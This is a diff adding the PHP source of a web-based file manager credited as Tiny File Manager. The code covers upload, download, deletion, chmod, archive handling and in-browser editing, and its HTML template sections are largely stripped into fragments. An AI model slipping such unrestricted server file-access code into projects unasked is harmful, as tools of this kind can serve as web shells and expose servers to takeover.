+ if (fm_isvalid_filename($new) && $old != '' && $new != '') { + if (fm_rename($path . '/' . $old, $path . '/' . $new)) { + fm_set_msg(sprintf(lng('Renamed from').' %s '. lng('to').' %s', fm_enc($old), fm_enc($new))); + } else { + fm_set_msg(sprintf(lng('Error while renaming from').' %s '. lng('to').' %s', fm_enc($old), fm_enc($new)), 'error'); + } + } else { + fm_set_msg(lng('Invalid characters in file name'), 'error'); + } + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); +} + +// Download +if (isset($_GET['dl'], $_POST['token'])) { + if(!verifyToken($_POST['token'])) { + fm_set_msg("Invalid Token.", 'error'); + } + + $dl = urldecode($_GET['dl']); + $dl = fm_clean_path($dl); + $dl = str_replace('/', '', $dl); + $path = FM_ROOT_PATH; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + if ($dl != '' && is_file($path . '/' . $dl)) { + fm_download_file($path . '/' . $dl, $dl, 1024); + exit; + } else { + fm_set_msg(lng('File not found'), 'error'); + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); + } +} + +// Upload +if (!empty($_FILES) && !FM_READONLY) { + if(isset($_POST['token'])) { + if(!verifyToken($_POST['token'])) { + $response = array ('status' => 'error','info' => "Invalid Token."); + echo json_encode($response); exit(); + } + } else { + $response = array ('status' => 'error','info' => "Token Missing."); + echo json_encode($response); exit(); + } + + $chunkIndex = $_POST['dzchunkindex']; + $chunkTotal = $_POST['dztotalchunkcount']; + $fullPathInput = fm_clean_path($_REQUEST['fullpath']); + + $f = $_FILES; + $path = FM_ROOT_PATH; + $ds = DIRECTORY_SEPARATOR; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + + $errors = 0; + $uploads = 0; + $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; + $response = array ( + 'status' => 'error', + 'info' => 'Oops! Try again' + ); + + $filename = $f['file']['name']; + $tmp_name = $f['file']['tmp_name']; + $ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : ''; + $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; + + if(!fm_isvalid_filename($filename) && !fm_isvalid_filename($fullPathInput)) { + $response = array ( + 'status' => 'error', + 'info' => "Invalid File name!", + ); + echo json_encode($response); exit(); + } + + $targetPath = $path . $ds; + if ( is_writable($targetPath) ) { + $fullPath = $path . '/' . basename($fullPathInput); + $folder = substr($fullPath, 0, strrpos($fullPath, "/")); + + if (!is_dir($folder)) { + $old = umask(0); + mkdir($folder, 0777, true); + umask($old); + } + + if (empty($f['file']['error']) && !empty($tmp_name) && $tmp_name != 'none' && $isFileAllowed) { + if ($chunkTotal){ + $out = @fopen("{$fullPath}.part", $chunkIndex == 0 ? "wb" : "ab"); + if ($out) { + $in = @fopen($tmp_name, "rb"); + if ($in) { + if (PHP_VERSION_ID < 80009) { + // workaround https://bugs.php.net/bug.php?id=81145 + do { + for (;;) { + $buff = fread($in, 4096); + if ($buff === false || $buff === '') { + break; + } + fwrite($out, $buff); + } + } while (!feof($in)); + } else { + stream_copy_to_stream($in, $out); + } + $response = array ( + 'status' => 'success', + 'info' => "file upload successful" + ); + } else { + $response = array ( + 'status' => 'error', + 'info' => "failed to open output stream", + 'errorDetails' => error_get_last() + ); + } + @fclose($in); + @fclose($out); + @unlink($tmp_name); + + $response = array ( + 'status' => 'success', + 'info' => "file upload successful" + ); + } else { + $response = array ( + 'status' => 'error', + 'info' => "failed to open output stream" + ); + } + + if ($chunkIndex == $chunkTotal - 1) { + if (file_exists ($fullPath)) { + $ext_1 = $ext ? '.'.$ext : ''; + $fullPathTarget = $path . '/' . basename($fullPathInput, $ext_1) .'_'. date('ymdHis'). $ext_1; + } else { + $fullPathTarget = $fullPath; + } + rename("{$fullPath}.part", $fullPathTarget); + } + + } else if (move_uploaded_file($tmp_name, $fullPath)) { + // Be sure that the file has been uploaded + if ( file_exists($fullPath) ) { + $response = array ( + 'status' => 'success', + 'info' => "file upload successful" + ); + } else { + $response = array ( + 'status' => 'error', + 'info' => 'Couldn\'t upload the requested file.' + ); + } + } else { + $response = array ( + 'status' => 'error', + 'info' => "Error while uploading files. Uploaded files $uploads", + ); + } + } + } else { + $response = array ( + 'status' => 'error', + 'info' => 'The specified folder for upload isn\'t writeable.' + ); + } + // Return the response + echo json_encode($response); + exit(); +} + +// Mass deleting +if (isset($_POST['group'], $_POST['delete'], $_POST['token']) && !FM_READONLY) { + + if(!verifyToken($_POST['token'])) { + fm_set_msg(lng("Invalid Token."), 'error'); + } + + $path = FM_ROOT_PATH; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + + $errors = 0; + $files = $_POST['file']; + if (is_array($files) && count($files)) { + foreach ($files as $f) { + if ($f != '') { + $new_path = $path . '/' . $f; + if (!fm_rdelete($new_path)) { + $errors++; + } + } + } + if ($errors == 0) { + fm_set_msg(lng('Selected files and folder deleted')); + } else { + fm_set_msg(lng('Error while deleting items'), 'error'); + } + } else { + fm_set_msg(lng('Nothing selected'), 'alert'); + } + + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); +} + +// Pack files zip, tar +if (isset($_POST['group'], $_POST['token']) && (isset($_POST['zip']) || isset($_POST['tar'])) && !FM_READONLY) { + + if(!verifyToken($_POST['token'])) { + fm_set_msg(lng("Invalid Token."), 'error'); + } + + $path = FM_ROOT_PATH; + $ext = 'zip'; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + + //set pack type + $ext = isset($_POST['tar']) ? 'tar' : 'zip'; + + if (($ext == "zip" && !class_exists('ZipArchive')) || ($ext == "tar" && !class_exists('PharData'))) { + fm_set_msg(lng('Operations with archives are not available'), 'error'); + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); + } + + $files = $_POST['file']; + $sanitized_files = array(); + + // clean path + foreach($files as $file){ + array_push($sanitized_files, fm_clean_path($file)); + } + + $files = $sanitized_files; + + if (!empty($files)) { + chdir($path); + + if (count($files) == 1) { + $one_file = reset($files); + $one_file = basename($one_file); + $zipname = $one_file . '_' . date('ymd_His') . '.'.$ext; + } else { + $zipname = 'archive_' . date('ymd_His') . '.'.$ext; + } + + if($ext == 'zip') { + $zipper = new FM_Zipper(); + $res = $zipper->create($zipname, $files); + } elseif ($ext == 'tar') { + $tar = new FM_Zipper_Tar(); + $res = $tar->create($zipname, $files); + } + + if ($res) { + fm_set_msg(sprintf(lng('Archive').' %s '.lng('Created'), fm_enc($zipname))); + } else { + fm_set_msg(lng('Archive not created'), 'error'); + } + } else { + fm_set_msg(lng('Nothing selected'), 'alert'); + } + + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); +} + +// Unpack zip, tar +if (isset($_POST['unzip'], $_POST['token']) && !FM_READONLY) { + + if(!verifyToken($_POST['token'])) { + fm_set_msg(lng("Invalid Token."), 'error'); + } + + $unzip = urldecode($_POST['unzip']); + $unzip = fm_clean_path($unzip); + $unzip = str_replace('/', '', $unzip); + $isValid = false; + + $path = FM_ROOT_PATH; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + + if ($unzip != '' && is_file($path . '/' . $unzip)) { + $zip_path = $path . '/' . $unzip; + $ext = pathinfo($zip_path, PATHINFO_EXTENSION); + $isValid = true; + } else { + fm_set_msg(lng('File not found'), 'error'); + } + + if (($ext == "zip" && !class_exists('ZipArchive')) || ($ext == "tar" && !class_exists('PharData'))) { + fm_set_msg(lng('Operations with archives are not available'), 'error'); + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); + } + + if ($isValid) { + //to folder + $tofolder = ''; + if (isset($_POST['tofolder'])) { + $tofolder = pathinfo($zip_path, PATHINFO_FILENAME); + if (fm_mkdir($path . '/' . $tofolder, true)) { + $path .= '/' . $tofolder; + } + } + + if($ext == "zip") { + $zipper = new FM_Zipper(); + $res = $zipper->unzip($zip_path, $path); + } elseif ($ext == "tar") { + try { + $gzipper = new PharData($zip_path); + if (@$gzipper->extractTo($path,null, true)) { + $res = true; + } else { + $res = false; + } + } catch (Exception $e) { + //TODO:: need to handle the error + $res = true; + } + } + + if ($res) { + fm_set_msg(lng('Archive unpacked')); + } else { + fm_set_msg(lng('Archive not unpacked'), 'error'); + } + } else { + fm_set_msg(lng('File not found'), 'error'); + } + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); +} + +// Change Perms (not for Windows) +if (isset($_POST['chmod'], $_POST['token']) && !FM_READONLY && !FM_IS_WIN) { + + if(!verifyToken($_POST['token'])) { + fm_set_msg(lng("Invalid Token."), 'error'); + } + + $path = FM_ROOT_PATH; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + + $file = $_POST['chmod']; + $file = fm_clean_path($file); + $file = str_replace('/', '', $file); + if ($file == '' || (!is_file($path . '/' . $file) && !is_dir($path . '/' . $file))) { + fm_set_msg(lng('File not found'), 'error'); + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); + } + + $mode = 0; + if (!empty($_POST['ur'])) { + $mode |= 0400; + } + if (!empty($_POST['uw'])) { + $mode |= 0200; + } + if (!empty($_POST['ux'])) { + $mode |= 0100; + } + if (!empty($_POST['gr'])) { + $mode |= 0040; + } + if (!empty($_POST['gw'])) { + $mode |= 0020; + } + if (!empty($_POST['gx'])) { + $mode |= 0010; + } + if (!empty($_POST['or'])) { + $mode |= 0004; + } + if (!empty($_POST['ow'])) { + $mode |= 0002; + } + if (!empty($_POST['ox'])) { + $mode |= 0001; + } + + if (@chmod($path . '/' . $file, $mode)) { + fm_set_msg(lng('Permissions changed')); + } else { + fm_set_msg(lng('Permissions not changed'), 'error'); + } + + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); +} + +/*************************** ACTIONS ***************************/ + +// get current path +$path = FM_ROOT_PATH; +if (FM_PATH != '') { + $path .= '/' . FM_PATH; +} + +// check path +if (!is_dir($path)) { + fm_redirect(FM_SELF_URL . '?p='); +} + +// get parent folder +$parent = fm_get_parent_path(FM_PATH); + +$objects = is_readable($path) ? scandir($path) : array(); +$folders = array(); +$files = array(); +$current_path = array_slice(explode("/",$path), -1)[0]; +if (is_array($objects) && fm_is_exclude_items($current_path)) { + foreach ($objects as $file) { + if ($file == '.' || $file == '..') { + continue; + } + if (!FM_SHOW_HIDDEN && substr($file, 0, 1) === '.') { + continue; + } + $new_path = $path . '/' . $file; + if (@is_file($new_path) && fm_is_exclude_items($file)) { + $files[] = $file; + } elseif (@is_dir($new_path) && $file != '.' && $file != '..' && fm_is_exclude_items($file)) { + $folders[] = $file; + } + } +} + +if (!empty($files)) { + natcasesort($files); +} +if (!empty($folders)) { + natcasesort($folders); +} + +// upload form +if (isset($_GET['upload']) && !FM_READONLY) { + fm_show_header(); // HEADER + fm_show_nav_path(FM_PATH); // current path + //get the allowed file extensions + function getUploadExt() { + $extArr = explode(',', FM_UPLOAD_EXTENSION); + if(FM_UPLOAD_EXTENSION && $extArr) { + array_walk($extArr, function(&$x) {$x = ".$x";}); + return implode(',', $extArr); + } + return ''; + } + ?> + +
+ +
+
+ +
+
+

+ + : +

+ +
+ + + +
+ +
+
+ + +
+
+
+ + + +
+
+
+
+
+
+
+ + + ' . PHP_EOL; + } + ?> +

: , ', $copy_files) ?>

+

:
+ + / +

+

+

+   + + +

+ +
+
+
+ +
+

Copying

+

+ Source path:
+ Destination folder: +

+

+ Copy   + Move   + Cancel +

+

+ +
+ + +
+
+
+ + +
+
+
+ +
+ +
+ +
+
+
+ +
+
+ /> +
+
+
+ +
+ +
+
+ /> +
+
+
+ +
+ +
+
+ /> +
+
+
+ +
+ +
+ +
+
+ +
+
+ +
+
+ +
+
+
+
+ + +
+
+
+ + +
+
+
+
+

Tiny File Manager

+

Author: Prasath Mani

+

Mail Us: ccpprogrammers[at]gmail.com

+
+
+
+ +
+
+
+ +
+
+
+ +
+
+

""

+

+ + :
+ File size:
+ MIME-type:
+ + :
+ :
+ :
+ : %
+ '.lng('Image size').': ' . (isset($image_size[0]) ? $image_size[0] : '0') . ' x ' . (isset($image_size[1]) ? $image_size[1] : '0') . '
'; + } + // Text info + if ($is_text) { + $is_utf8 = fm_is_utf8($content); + if (function_exists('iconv')) { + if (!$is_utf8) { + $content = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $content); + } + } + echo ''.lng('Charset').': ' . ($is_utf8 ? 'utf-8' : '8 bit') . '
'; + } + ?> +

+
+
+ +   +
+ + +
+ + + +
  +
+ + + + +
  + + +   + +   + + +
+ '; + } else if($online_viewer == 'microsoft') { + echo ''; + } + } elseif ($is_zip) { + // ZIP content + if ($filenames !== false) { + echo ''; + foreach ($filenames as $fn) { + if ($fn['folder']) { + echo '' . fm_enc($fn['name']) . '
'; + } else { + echo $fn['name'] . ' (' . fm_get_filesize($fn['filesize']) . ')
'; + } + } + echo '
'; + } else { + echo '

'.lng('Error while fetching archive info').'

'; + } + } elseif ($is_image) { + // Image content + if (in_array($ext, array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))) { + echo '

'; + } + } elseif ($is_audio) { + // Audio content + echo '

'; + } elseif ($is_video) { + // Video content + echo '
'; + } elseif ($is_text) { + if (FM_USE_HIGHLIGHTJS) { + // highlight + $hljs_classes = array( + 'shtml' => 'xml', + 'htaccess' => 'apache', + 'phtml' => 'php', + 'lock' => 'json', + 'svg' => 'xml', + ); + $hljs_class = isset($hljs_classes[$ext]) ? 'lang-' . $hljs_classes[$ext] : 'lang-' . $ext; + if (empty($ext) || in_array(strtolower($file), fm_get_text_names()) || preg_match('#\.min\.(css|js)$#i', $file)) { + $hljs_class = 'nohighlight'; + } + $content = '
' . fm_enc($content) . '
'; + } elseif (in_array($ext, array('php', 'php4', 'php5', 'phtml', 'phps'))) { + // php highlight + $content = highlight_string($content, true); + } else { + $content = '
' . fm_enc($content) . '
'; + } + echo $content; + } + ?> +
+
+ '. $file. ''; + header('X-XSS-Protection:0'); + fm_show_header(); // HEADER + fm_show_nav_path(FM_PATH); // current path + + $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file); + $file_path = $path . '/' . $file; + + // normal editer + $isNormalEditor = true; + if (isset($_GET['env'])) { + if ($_GET['env'] == "ace") { + $isNormalEditor = false; + } + } + + // Save File + if (isset($_POST['savedata'])) { + $writedata = $_POST['savedata']; + $fd = fopen($file_path, "w"); + @fwrite($fd, $writedata); + fclose($fd); + fm_set_msg(lng('File Saved Successfully')); + } + + $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION)); + $mime_type = fm_get_mime_type($file_path); + $filesize = filesize($file_path); + $is_text = false; + $content = ''; // for text + + if (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) { + $is_text = true; + $content = file_get_contents($file_path); + } + + ?> +
+
+
+ +
+
+ + + + + + + + + + + +
+
+ ' . htmlspecialchars($content) . ''; + echo ''; + } elseif ($is_text) { + echo '
' . htmlspecialchars($content) . '
'; + } else { + fm_set_msg(lng('FILE EXTENSION HAS NOT SUPPORTED'), 'error'); + } + ?> +
+ +
+
+
+ +
+
+

+ + :
+

+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ +

+ +   + +

+
+
+
+
+ +
+ + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + '?'); + } + if ($group === false) { + $group = array('name' => '?'); + } + } else { + $owner = array('name' => '?'); + $group = array('name' => '?'); + } + ?> + + + + + + + + + + + + + '?'); + } + if ($group === false) { + $group = array('name' => '?'); + } + } else { + $owner = array('name' => '?'); + $group = array('name' => '?'); + } + ?> + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
+ + +
+
..
+
+ + +
+
> +
+ ' . readlink($path . '/' . $f) . '' : '') ?>
+
"> + + + + + + + + +
+
+ + +
+
> +
+ + + + + + + + + ' . readlink($path . '/' . $f) . '' : '') ?> +
+
"> + + + + + + + + + + +
+ '.fm_get_filesize($all_files_size).'' ?> + '.$num_files.'' ?> + '.$num_folders.'' ?> +
+
+ +
+ +
+ +
+ + + + +
+
+ +"; + return; + } + + echo "$external[$key]"; +} + +/** + * Verify CSRF TOKEN and remove after cerify + * @param string $token + * @return bool + */ +function verifyToken($token) +{ + if (hash_equals($_SESSION['token'], $token)) { + return true; + } + return false; +} + +/** + * Delete file or folder (recursively) + * @param string $path + * @return bool + */ +function fm_rdelete($path) +{ + if (is_link($path)) { + return unlink($path); + } elseif (is_dir($path)) { + $objects = scandir($path); + $ok = true; + if (is_array($objects)) { + foreach ($objects as $file) { + if ($file != '.' && $file != '..') { + if (!fm_rdelete($path . '/' . $file)) { + $ok = false; + } + } + } + } + return ($ok) ? rmdir($path) : false; + } elseif (is_file($path)) { + return unlink($path); + } + return false; +} + +/** + * Recursive chmod + * @param string $path + * @param int $filemode + * @param int $dirmode + * @return bool + * @todo Will use in mass chmod + */ +function fm_rchmod($path, $filemode, $dirmode) +{ + if (is_dir($path)) { + if (!chmod($path, $dirmode)) { + return false; + } + $objects = scandir($path); + if (is_array($objects)) { + foreach ($objects as $file) { + if ($file != '.' && $file != '..') { + if (!fm_rchmod($path . '/' . $file, $filemode, $dirmode)) { + return false; + } + } + } + } + return true; + } elseif (is_link($path)) { + return true; + } elseif (is_file($path)) { + return chmod($path, $filemode); + } + return false; +} + +/** + * Check the file extension which is allowed or not + * @param string $filename + * @return bool + */ +function fm_is_valid_ext($filename) +{ + $allowed = (FM_FILE_EXTENSION) ? explode(',', FM_FILE_EXTENSION) : false; + + $ext = pathinfo($filename, PATHINFO_EXTENSION); + $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; + + return ($isFileAllowed) ? true : false; +} + +/** + * Safely rename + * @param string $old + * @param string $new + * @return bool|null + */ +function fm_rename($old, $new) +{ + $isFileAllowed = fm_is_valid_ext($new); + + if(!is_dir($old)) { + if (!$isFileAllowed) return false; + } + + return (!file_exists($new) && file_exists($old)) ? rename($old, $new) : null; +} + +/** + * Copy file or folder (recursively). + * @param string $path + * @param string $dest + * @param bool $upd Update files + * @param bool $force Create folder with same names instead file + * @return bool + */ +function fm_rcopy($path, $dest, $upd = true, $force = true) +{ + if (is_dir($path)) { + if (!fm_mkdir($dest, $force)) { + return false; + } + $objects = scandir($path); + $ok = true; + if (is_array($objects)) { + foreach ($objects as $file) { + if ($file != '.' && $file != '..') { + if (!fm_rcopy($path . '/' . $file, $dest . '/' . $file)) { + $ok = false; + } + } + } + } + return $ok; + } elseif (is_file($path)) { + return fm_copy($path, $dest, $upd); + } + return false; +} + +/** + * Safely create folder + * @param string $dir + * @param bool $force + * @return bool + */ +function fm_mkdir($dir, $force) +{ + if (file_exists($dir)) { + if (is_dir($dir)) { + return $dir; + } elseif (!$force) { + return false; + } + unlink($dir); + } + return mkdir($dir, 0777, true); +} + +/** + * Safely copy file + * @param string $f1 + * @param string $f2 + * @param bool $upd Indicates if file should be updated with new content + * @return bool + */ +function fm_copy($f1, $f2, $upd) +{ + $time1 = filemtime($f1); + if (file_exists($f2)) { + $time2 = filemtime($f2); + if ($time2 >= $time1 && $upd) { + return false; + } + } + $ok = copy($f1, $f2); + if ($ok) { + touch($f2, $time1); + } + return $ok; +} + +/** + * Get mime type + * @param string $file_path + * @return mixed|string + */ +function fm_get_mime_type($file_path) +{ + if (function_exists('finfo_open')) { + $finfo = finfo_open(FILEINFO_MIME_TYPE); + $mime = finfo_file($finfo, $file_path); + finfo_close($finfo); + return $mime; + } elseif (function_exists('mime_content_type')) { + return mime_content_type($file_path); + } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) { + $file = escapeshellarg($file_path); + $mime = shell_exec('file -bi ' . $file); + return $mime; + } else { + return '--'; + } +} + +/** + * HTTP Redirect + * @param string $url + * @param int $code + */ +function fm_redirect($url, $code = 302) +{ + header('Location: ' . $url, true, $code); + exit; +} + +/** + * Path traversal prevention and clean the url + * It replaces (consecutive) occurrences of / and \\ with whatever is in DIRECTORY_SEPARATOR, and processes /. and /.. fine. + * @param $path + * @return string + */ +function get_absolute_path($path) { + $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path); + $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen'); + $absolutes = array(); + foreach ($parts as $part) { + if ('.' == $part) continue; + if ('..' == $part) { + array_pop($absolutes); + } else { + $absolutes[] = $part; + } + } + return implode(DIRECTORY_SEPARATOR, $absolutes); +} + +/** + * Clean path + * @param string $path + * @return string + */ +function fm_clean_path($path, $trim = true) +{ + $path = $trim ? trim($path) : $path; + $path = trim($path, '\\/'); + $path = str_replace(array('../', '..\\'), '', $path); + $path = get_absolute_path($path); + if ($path == '..') { + $path = ''; + } + return str_replace('\\', '/', $path); +} + +/** + * Get parent path + * @param string $path + * @return bool|string + */ +function fm_get_parent_path($path) +{ + $path = fm_clean_path($path); + if ($path != '') { + $array = explode('/', $path); + if (count($array) > 1) { + $array = array_slice($array, 0, -1); + return implode('/', $array); + } + return ''; + } + return false; +} + +function fm_get_display_path($file_path) +{ + global $path_display_mode, $root_path, $root_url; + switch ($path_display_mode) { + case 'relative': + return array( + 'label' => 'Path', + 'path' => fm_enc(fm_convert_win(str_replace($root_path, '', $file_path))) + ); + case 'host': + $relative_path = str_replace($root_path, '', $file_path); + return array( + 'label' => 'Host Path', + 'path' => fm_enc(fm_convert_win('/' . $root_url . '/' . ltrim(str_replace('\\', '/', $relative_path), '/'))) + ); + case 'full': + default: + return array( + 'label' => 'Full Path', + 'path' => fm_enc(fm_convert_win($file_path)) + ); + } +} + +/** + * Check file is in exclude list + * @param string $file + * @return bool + */ +function fm_is_exclude_items($file) { + $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); + if (isset($exclude_items) and sizeof($exclude_items)) { + unset($exclude_items); + } + + $exclude_items = FM_EXCLUDE_ITEMS; + if (version_compare(PHP_VERSION, '7.0.0', '<')) { + $exclude_items = unserialize($exclude_items); + } + if (!in_array($file, $exclude_items) && !in_array("*.$ext", $exclude_items)) { + return true; + } + return false; +} + +/** + * get language translations from json file + * @param int $tr + * @return array + */ +function fm_get_translations($tr) { + try { + $content = @file_get_contents('translation.json'); + if($content !== FALSE) { + $lng = json_decode($content, TRUE); + global $lang_list; + foreach ($lng["language"] as $key => $value) + { + $code = $value["code"]; + $lang_list[$code] = $value["name"]; + if ($tr) + $tr[$code] = $value["translation"]; + } + return $tr; + } + + } + catch (Exception $e) { + echo $e; + } +} + +/** + * @param string $file + * Recover all file sizes larger than > 2GB. + * Works on php 32bits and 64bits and supports linux + * @return int|string + */ +function fm_get_size($file) +{ + static $iswin; + static $isdarwin; + if (!isset($iswin)) { + $iswin = (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN'); + } + if (!isset($isdarwin)) { + $isdarwin = (strtoupper(substr(PHP_OS, 0)) == "DARWIN"); + } + + static $exec_works; + if (!isset($exec_works)) { + $exec_works = (function_exists('exec') && !ini_get('safe_mode') && @exec('echo EXEC') == 'EXEC'); + } + + // try a shell command + if ($exec_works) { + $arg = escapeshellarg($file); + $cmd = ($iswin) ? "for %F in (\"$file\") do @echo %~zF" : ($isdarwin ? "stat -f%z $arg" : "stat -c%s $arg"); + @exec($cmd, $output); + if (is_array($output) && ctype_digit($size = trim(implode("\n", $output)))) { + return $size; + } + } + + // try the Windows COM interface + if ($iswin && class_exists("COM")) { + try { + $fsobj = new COM('Scripting.FileSystemObject'); + $f = $fsobj->GetFile( realpath($file) ); + $size = $f->Size; + } catch (Exception $e) { + $size = null; + } + if (ctype_digit($size)) { + return $size; + } + } + + // if all else fails + return filesize($file); +} + +/** + * Get nice filesize + * @param int $size + * @return string + */ +function fm_get_filesize($size) +{ + $size = (float) $size; + $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'); + $power = ($size > 0) ? floor(log($size, 1024)) : 0; + $power = ($power > (count($units) - 1)) ? (count($units) - 1) : $power; + return sprintf('%s %s', round($size / pow(1024, $power), 2), $units[$power]); +} + +/** + * Get total size of directory tree. + * + * @param string $directory Relative or absolute directory name. + * @return int Total number of bytes. + */ +function fm_get_directorysize($directory) { + $bytes = 0; + $directory = realpath($directory); + if ($directory !== false && $directory != '' && file_exists($directory)){ + foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory, FilesystemIterator::SKIP_DOTS)) as $file){ + $bytes += $file->getSize(); + } + } + return $bytes; +} + +/** + * Get info about zip archive + * @param string $path + * @return array|bool + */ +function fm_get_zif_info($path, $ext) { + if ($ext == 'zip' && function_exists('zip_open')) { + $arch = @zip_open($path); + if ($arch) { + $filenames = array(); + while ($zip_entry = @zip_read($arch)) { + $zip_name = @zip_entry_name($zip_entry); + $zip_folder = substr($zip_name, -1) == '/'; + $filenames[] = array( + 'name' => $zip_name, + 'filesize' => @zip_entry_filesize($zip_entry), + 'compressed_size' => @zip_entry_compressedsize($zip_entry), + 'folder' => $zip_folder + //'compression_method' => zip_entry_compressionmethod($zip_entry), + ); + } + @zip_close($arch); + return $filenames; + } + } elseif($ext == 'tar' && class_exists('PharData')) { + $archive = new PharData($path); + $filenames = array(); + foreach(new RecursiveIteratorIterator($archive) as $file) { + $parent_info = $file->getPathInfo(); + $zip_name = str_replace("phar://".$path, '', $file->getPathName()); + $zip_name = substr($zip_name, ($pos = strpos($zip_name, '/')) !== false ? $pos + 1 : 0); + $zip_folder = $parent_info->getFileName(); + $zip_info = new SplFileInfo($file); + $filenames[] = array( + 'name' => $zip_name, + 'filesize' => $zip_info->getSize(), + 'compressed_size' => $file->getCompressedSize(), + 'folder' => $zip_folder + ); + } + return $filenames; + } + return false; +} + +/** + * Encode html entities + * @param string $text + * @return string + */ +function fm_enc($text) +{ + return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); +} + +/** + * Prevent XSS attacks + * @param string $text + * @return string + */ +function fm_isvalid_filename($text) { + return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false; +} + +/** + * Save message in session + * @param string $msg + * @param string $status + */ +function fm_set_msg($msg, $status = 'ok') +{ + $_SESSION[FM_SESSION_ID]['message'] = $msg; + $_SESSION[FM_SESSION_ID]['status'] = $status; +} + +/** + * Check if string is in UTF-8 + * @param string $string + * @return int + */ +function fm_is_utf8($string) +{ + return preg_match('//u', $string); +} + +/** + * Convert file name to UTF-8 in Windows + * @param string $filename + * @return string + */ +function fm_convert_win($filename) +{ + if (FM_IS_WIN && function_exists('iconv')) { + $filename = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $filename); + } + return $filename; +} + +/** + * @param $obj + * @return array + */ +function fm_object_to_array($obj) +{ + if (!is_object($obj) && !is_array($obj)) { + return $obj; + } + if (is_object($obj)) { + $obj = get_object_vars($obj); + } + return array_map('fm_object_to_array', $obj); +} + +/** + * Get CSS classname for file + * @param string $path + * @return string + */ +function fm_get_file_icon_class($path) +{ + // get extension + $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); + + switch ($ext) { + case 'ico': + case 'gif': + case 'jpg': + case 'jpeg': + case 'jpc': + case 'jp2': + case 'jpx': + case 'xbm': + case 'wbmp': + case 'png': + case 'bmp': + case 'tif': + case 'tiff': + case 'webp': + case 'avif': + case 'svg': + $img = 'fa fa-picture-o'; + break; + case 'passwd': + case 'ftpquota': + case 'sql': + case 'js': + case 'ts': + case 'jsx': + case 'tsx': + case 'hbs': + case 'json': + case 'sh': + case 'config': + case 'twig': + case 'tpl': + case 'md': + case 'gitignore': + case 'c': + case 'cpp': + case 'cs': + case 'py': + case 'rs': + case 'map': + case 'lock': + case 'dtd': + $img = 'fa fa-file-code-o'; + break; + case 'txt': + case 'ini': + case 'conf': + case 'log': + case 'htaccess': + case 'yaml': + case 'yml': + case 'toml': + case 'tmp': + case 'top': + case 'bot': + case 'dat': + case 'bak': + case 'htpasswd': + case 'pl': + $img = 'fa fa-file-text-o'; + break; + case 'css': + case 'less': + case 'sass': + case 'scss': + $img = 'fa fa-css3'; + break; + case 'bz2': + case 'zip': + case 'rar': + case 'gz': + case 'tar': + case '7z': + case 'xz': + $img = 'fa fa-file-archive-o'; + break; + case 'php': + case 'php4': + case 'php5': + case 'phps': + case 'phtml': + $img = 'fa fa-code'; + break; + case 'htm': + case 'html': + case 'shtml': + case 'xhtml': + $img = 'fa fa-html5'; + break; + case 'xml': + case 'xsl': + $img = 'fa fa-file-excel-o'; + break; + case 'wav': + case 'mp3': + case 'mp2': + case 'm4a': + case 'aac': + case 'ogg': + case 'oga': + case 'wma': + case 'mka': + case 'flac': + case 'ac3': + case 'tds': + $img = 'fa fa-music'; + break; + case 'm3u': + case 'm3u8': + case 'pls': + case 'cue': + case 'xspf': + $img = 'fa fa-headphones'; + break; + case 'avi': + case 'mpg': + case 'mpeg': + case 'mp4': + case 'm4v': + case 'flv': + case 'f4v': + case 'ogm': + case 'ogv': + case 'mov': + case 'mkv': + case '3gp': + case 'asf': + case 'wmv': + case 'webm': + $img = 'fa fa-file-video-o'; + break; + case 'eml': + case 'msg': + $img = 'fa fa-envelope-o'; + break; + case 'xls': + case 'xlsx': + case 'ods': + $img = 'fa fa-file-excel-o'; + break; + case 'csv': + $img = 'fa fa-file-text-o'; + break; + case 'bak': + case 'swp': + $img = 'fa fa-clipboard'; + break; + case 'doc': + case 'docx': + case 'odt': + $img = 'fa 